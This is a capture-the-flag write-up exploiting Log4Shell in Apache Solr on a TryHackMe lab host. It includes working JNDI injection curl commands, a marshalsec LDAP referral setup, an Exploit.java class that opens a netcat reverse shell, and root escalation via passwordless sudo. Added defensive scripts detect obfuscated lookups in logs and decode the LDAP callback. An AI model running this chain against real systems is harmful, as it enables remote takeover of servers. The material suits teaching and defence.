Log4j Solr THM
Log4j
Apache Log4j is a Java-based logging utility originally written by Ceki Gülcü. It is part of the Apache Logging Services, a project of the Apache Software Foundation. Log4j is one of several Java logging frameworks.
What is Apache Solr
Solr is an open-source enterprise-search platform, written in Java. Its major features include full-text search, hit highlighting, faceted search, real-time indexing, dynamic clustering, database integration, NoSQL features and rich document handling.
Log4j attack
On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package log4j. The vulnerability earned a CVSS severity score of 10.0 (the most critical designation) and offers trivial remote code execution on hosts running software that uses a vulnerable log4j version. The attack has been dubbed "Log4Shell".
Reference:
https://github.com/fullhunt/log4j-scan
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://logging.apache.org/log4j/2.x/security.html
https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/
https://github.com/zhuowei/GhidraLog4Shell
https://twitter.com/fullhunt/status/1470275912449105930?s=24
Starting Lab THM
Starting with an nmap scan using -sV (version detection) and -sC (default scripts)
nmap -sV -sC 10.10.67.21
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-19 00:01 EST
Nmap scan report for 10.10.67.21
Host is up (0.19s latency).
Not shown: 937 closed ports, 61 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:35:e1:4f:4e:87:45:9e:5f:2c:97:e0:da:a9:df:d5 (RSA)
| 256 b2:fd:9b:75:1c:9e:80:19:5d:13:4e:8d:a0:83:7b:f9 (ECDSA)
|_ 256 75:20:0b:43:14:a9:8a:49:1a:d9:29:33:e1:b9:1a:b6 (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.24 seconds
The default scan only covers nmap's top 1000 ports and did not show Solr, so scan all 65535 ports with -p- (slow against the lab: about 52 minutes)
nmap -p- -sV 10.10.67.21
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-19 00:14 EST
Stats: 0:04:54 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 24.23% done; ETC: 00:33 (0:14:39 remaining)
Stats: 0:17:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 37.25% done; ETC: 01:01 (0:29:31 remaining)
Stats: 0:31:23 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 64.10% done; ETC: 01:03 (0:17:27 remaining)
Nmap scan report for 10.10.67.21
Host is up (0.18s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind 2-4 (RPC #100000)
8983/tcp open http Apache Solr
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3145.17 seconds
Apache Solr is running on port 8983; confirming with a targeted version scan
nmap -p8983 10.10.67.21 -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-19 00:59 EST
Nmap scan report for 10.10.67.21
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
8983/tcp open http Apache Solr
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.83 seconds
Accessing it in a web browser
firefox http://10.10.67.21:8983/
The Solr admin dashboard shows plenty of log output, and among the JVM arguments is the directory that matters for this attack. Solr writes request details to its log through Log4j, which is how an attacker-controlled query parameter reaches the vulnerable lookup.
-Dsolr.log.dir : /var/solr/logs
Before getting into the Log4j attack itself we need to be clear on a few terms: LDAP, JNDI, and JNDI injection.
Java Naming and Directory Interface (JNDI)
The Java Naming and Directory Interface is a Java API for a directory service that allows Java software clients to discover and look up data and resources via a name. Like all Java APIs that interface with host systems, JNDI is independent of the underlying implementation.
Lightweight Directory Access Protocol (LDAP)
The Lightweight Directory Access Protocol is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network.
jndi-injections-java
https://www.veracode.com/blog/research/exploiting-jndi-injections-java
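To make the JNDI point concrete from the defender's side, here is an added example (my own code, not from the THM room or this writeup). Log4j resolves nested lookups innermost-first, so attackers hide the dangerous `${jndi:` behind `${lower:}`, `${upper:}` and `${key:-default}` constructs that a plain grep for "jndi" misses. The script emulates that resolution, then scans constructed Solr-style request log lines; the log lines, timestamps and attacker hostnames are made up for the example, and the detector goes beyond the single plain `${jndi:...}` form used in this writeup.

```python
import re

# Innermost lookup: a ${...} whose body contains no further braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# Private markers for a lookup we deliberately leave unresolved (jndi:, date:, ...),
# so that _INNER stops re-matching it; restored to ${...} at the end.
_OPEN, _CLOSE = "\x01", "\x02"
# Log4j lookup names are matched case-insensitively, so ${JNDI:...} also fires.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Emulate the Log4j 2 lookups that matter for de-obfuscation.

    lower:/upper: are Log4j's case-mapping lookups; ':-' separates a default
    value that Log4j substitutes when the key is empty or unknown, so ${::-j}
    and ${env:NOPE:-j} both become the letter j. Anything else, jndi: included,
    is kept as an unresolved lookup so it stays visible in the output.
    """
    prefix, _, rest = body.partition(":")
    key = prefix.lower()
    if key == "jndi":                 # never resolve the dangerous lookup away
        return _OPEN + body + _CLOSE
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in body:                  # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    return _OPEN + body + _CLOSE


def normalize(text: str, max_passes: int = 50) -> str:
    """Collapse nested and obfuscated ${...} lookups, innermost first, the way
    Log4j's substitutor would before the jndi: lookup fires."""
    for _ in range(max_passes):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text.replace(_OPEN, "${").replace(_CLOSE, "}")


def is_jndi_attempt(line: str) -> bool:
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return (line number, normalized line) for every line carrying a JNDI lookup."""
    return [(n, normalize(l)) for n, l in enumerate(lines, 1) if is_jndi_attempt(l)]


# Constructed Solr-style request log lines (made up for this example).
_PFX = ("2021-12-19 05:11:02.184 INFO  (qtp1-17) [   ] o.a.s.s.HttpSolrCall "
        "[admin] webapp=null path=/admin/cores ")
SAMPLE_LOG = [
    _PFX + "params={action=STATUS&wt=json} status=0 QTime=1",
    _PFX + "params={hello=${jndi:ldap://10.9.0.246:9001}} status=0 QTime=0",
    _PFX + "params={x=${${lower:j}ndi:ldap://attacker.example/a}} status=0 QTime=0",
    _PFX + "params={x=${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}} status=0 QTime=0",
    _PFX + "params={x=${${env:BARFOO:-j}ndi${env:BARFOO:-:}ldap://attacker.example/a}} status=0 QTime=0",
    _PFX + "params={x=${${upper:j}ndi:rmi://attacker.example/a}} status=0 QTime=0",
    _PFX + "params={q=${date:yyyy}} status=0 QTime=0",
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line.split('params=', 1)[1]}")
```

Run it on real solr.log lines (the directory from the dashboard above) to see every request that carried a lookup, normalized to what Log4j would actually have resolved. Because `${jndi:...}` is never resolved away, the output keeps the attacker's LDAP or RMI URL for triage.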
While researching Apache Solr, the CoreAdmin API turned out to be a useful injection point, since the query parameters of requests to it end up in the log:
/solr/admin/cores?
Reference for the CoreAdmin API:
https://solr.apache.org/guide/6_6/coreadmin-api.html
Testing whether the Log4j injection works
Start a listener, then send a request with a JNDI lookup in an arbitrary query parameter that points back at it:
$ nc -nlvp 9001
$ curl '10.10.2.185:8983/solr/admin/cores?hello=$\{jndi:ldap://10.9.0.246:9001\}'
{
"responseHeader":{
"status":0,
"QTime":0},
"initFailures":{},
"status":{}}
$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.0.246] from (UNKNOWN) [10.10.2.185] 39326
0
`�
The target connected back. The garbage after the connection line is the beginning of the LDAP bind the victim JVM sends while trying to resolve the lookup; the callback alone confirms that the parameter reached a vulnerable Log4j.
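What the listener actually received, as an added example (my own code, not part of the room or this writeup): a small BER decoder for the first message a Java JNDI client sends after connecting, an anonymous LDAPv3 BindRequest. The bytes below are the bind the JDK's LDAP provider emits for a connection without credentials; they are reconstructed here as an assumption, not captured from this lab. They match the two printable characters in the nc output above: 0x30 is '0' and 0x60 is '`', and the 0x0c (form feed) between them is most likely why the two land on separate lines in the terminal.

```python
# Reconstructed (assumed, not captured from the lab) first message Java's JNDI
# LDAP provider sends after connecting: LDAPMessage { messageID 1,
# BindRequest { version 3, name "", simple credentials "" } }.
SAMPLE_BIND = bytes.fromhex("30 0c 02 01 01 60 07 02 01 03 04 00 80 00")


def read_tlv(buf: bytes, pos: int):
    """Read one BER tag/length/value at pos -> (tag, value, next_pos).
    Supports the short and definite long length forms, which is all LDAP uses."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated value")
    return tag, value, pos + length


def parse_ldap_message(buf: bytes) -> dict:
    """Decode LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp CHOICE {...} }
    far enough to recognise a BindRequest ([APPLICATION 0] constructed, tag 0x60)."""
    tag, msg, end = read_tlv(buf, 0)
    if tag != 0x30:
        raise ValueError(f"expected SEQUENCE (0x30), got 0x{tag:02x}")
    t, mid, p = read_tlv(msg, 0)
    if t != 0x02:
        raise ValueError("expected INTEGER messageID")
    op_tag, op, _ = read_tlv(msg, p)
    out = {"message_id": int.from_bytes(mid, "big"), "op_tag": op_tag,
           "trailing": len(buf) - end}
    if op_tag == 0x60:                    # BindRequest
        _, ver, p = read_tlv(op, 0)       # INTEGER version (Java asks for 3)
        _, name, p = read_tlv(op, p)      # LDAPDN, an OCTET STRING; empty = anonymous
        auth_tag, cred, _ = read_tlv(op, p)   # AuthenticationChoice; [0] (0x80) = simple
        out.update(op="bindRequest",
                   version=int.from_bytes(ver, "big"),
                   name=name.decode("utf-8"),
                   auth="simple" if auth_tag == 0x80 else f"other(0x{auth_tag:02x})",
                   credentials=cred)
    else:
        out["op"] = f"unhandled(0x{op_tag:02x})"
    return out


def as_terminal(buf: bytes) -> str:
    """Render bytes roughly the way a terminal shows raw nc output:
    printable ASCII as-is, everything else as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in buf)


if __name__ == "__main__":
    print(as_terminal(SAMPLE_BIND))
    print(parse_ldap_message(SAMPLE_BIND))
```

For a real engagement, capture the callback with tcpdump or nc -k with output to a file instead of reading the terminal, then feed the bytes to parse_ldap_message; a version 3 anonymous bind from the target is the signature of a JNDI lookup in progress, before any exploit class has been served.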
We need a JDK 8 on the attacking machine; the room uses 1.8.0_181. The reason is compatibility: Exploit.java is compiled locally and then loaded by the target's Java 8 runtime, so it has to be compiled with a JDK 8 (a newer javac without --release 8 produces a class-file version the target cannot load), and marshalsec is a Java 8 project. This is separate from the target side: loading a class from a remote codebase through an LDAP reference only works while the target JVM still trusts URL codebases (com.sun.jndi.ldap.object.trustURLCodebase), which Oracle turned off by default from 8u191 onwards.
Steps to set it up locally
Download the JDK from the mirror
http://mirrors.rootpei.com/jdk/
Download the following version of the JDK
jdk-8u181-linux-x64.tar.gz
$ sudo mkdir -p /usr/lib/jvm
$ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz -C /usr/lib/jvm
$ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
$ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
$ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1
$ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
$ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
$ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
$ java -version
java version "1.8.0_181"
Java(TM) SE Runtime Environment (build 1.8.0_181-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.181-b13, mixed mode)
marshalsec is built with Maven, so we need to install Maven first
Maven
Maven is a command-line build tool for Java applications; it is itself written in Java, so a JDK must be installed before installing and using Maven.
$ sudo apt install maven
marshalsec setup
$ git clone https://github.com/mbechler/marshalsec
$ cd marshalsec
To build marshalsec run the command in marshalsec folder.
$ mvn clean package -DskipTests
Start the LDAP referral server, which redirects the victim's JNDI lookup to our secondary HTTP server hosting the class (run in the marshalsec folder; the argument is the codebase URL followed by the class name after #):
$ java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.9.1.21:9999/#Exploit"
Listening on 0.0.0.0:1389
The LDAP server is now running on port 1389 (marshalsec's default)
Create a Java payload for the reverse connection, Exploit.java
// Exploit.java: the class the victim JVM fetches from our HTTP server.
// The static initializer runs as soon as the class is loaded by the JNDI
// reference factory, so no method needs to be called to trigger the payload.
public class Exploit {
    static {
        try {
            // nc -e requires the traditional netcat on the target, which this room has
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 10.9.1.21 9090");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Compile it with the JDK 8 javac (javac Exploit.java) so that Exploit.class exists, then serve the directory over HTTP on the same port we gave the LDAP referral server (9999)
$ python3 -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/)
Start Listener using nc
$ nc -nlvp 9090
Trigger the lookup with curl. The attacker and target addresses differ from the earlier test because the lab was restarted; what matters is that the LDAP URL points at the referral server on port 1389 and names the class to load (Exploit)
$ curl '10.10.226.102:8983/solr/admin/cores?cmd=$\{jndi:ldap://10.9.1.21:1389/Exploit\}'
{
"responseHeader":{
"status":0,
"QTime":0},
"initFailures":{},
"status":{}}
Woohoo!!!! Got Shell
nc -nlvp 9090
listening on [any] 9090 ...
connect to [10.9.1.21] from (UNKNOWN) [10.10.226.102] 44250
whoami
solr
Upgrading to an interactive TTY
$ python3 -c "import pty; pty.spawn('/bin/bash')"
$ export TERM=xterm
Root access
solr@solar:/opt/solr/server$ sudo -l
Matching Defaults entries for solr on solar:
env_reset, exempt_group=sudo, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User solr may run the following commands on solar:
(ALL) NOPASSWD: ALL
The solr user may run any command as root without a password, so escalation is a single sudo (the first attempt, su bash, fails because bash is not a user)
solr@solar:/opt/solr/server$ su bash
No passwd entry for user 'bash'
solr@solar:/opt/solr/server$ sudo bash
root@solar:/opt/solr-8.11.0/server# passwd
Enter new UNIX password: 123.com
Retype new UNIX password: 123.com
passwd: password updated successfully
root@solar:/opt/solr-8.11.0/server#
Setting a root password gives us direct SSH access afterwards (fine in a lab, but on a real engagement this modifies the host and should be avoided; the address was obscured in the original)
$ ssh root@<target IP>